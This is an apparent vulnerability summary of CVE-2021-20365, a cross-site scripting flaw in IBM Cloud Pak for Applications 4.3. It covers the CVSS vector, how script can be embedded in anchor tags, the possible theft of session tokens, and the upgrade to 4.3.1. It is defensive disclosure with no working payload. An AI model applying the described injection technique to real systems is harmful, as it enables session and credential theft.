CVE-2021-20365

Vulnerability

IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting (XSS) due to improper sanitization of user input in the Web UI, as reported in [1]. The vulnerability allows users to embed arbitrary JavaScript code, potentially altering intended functionality. All versions of IBM Cloud Pak for Applications are affected, with version 4.3 specifically mentioned in the CVE [1].

Exploitation

An attacker with low privileges can craft a script injection that executes when a victim views the malicious content, requiring user interaction. The CVSS vector (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates the attacker needs network access and user interaction to trigger the script [1]. The attacker may embed JavaScript in anchor tags with target="_blank" attributes, leading to script execution in the victim's session.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session, potentially leading to disclosure of credentials or session tokens. The impact is limited to low confidentiality and integrity compromise within the browser session [1].

Mitigation

IBM recommends upgrading to IBM Cloud Pak for Applications 4.3.1, which fixes the vulnerability by sanitizing user input and preventing arbitrary JavaScript execution [1]. No workarounds are available. The vulnerability is not listed on CISA's known exploited vulnerabilities (KEV) catalog.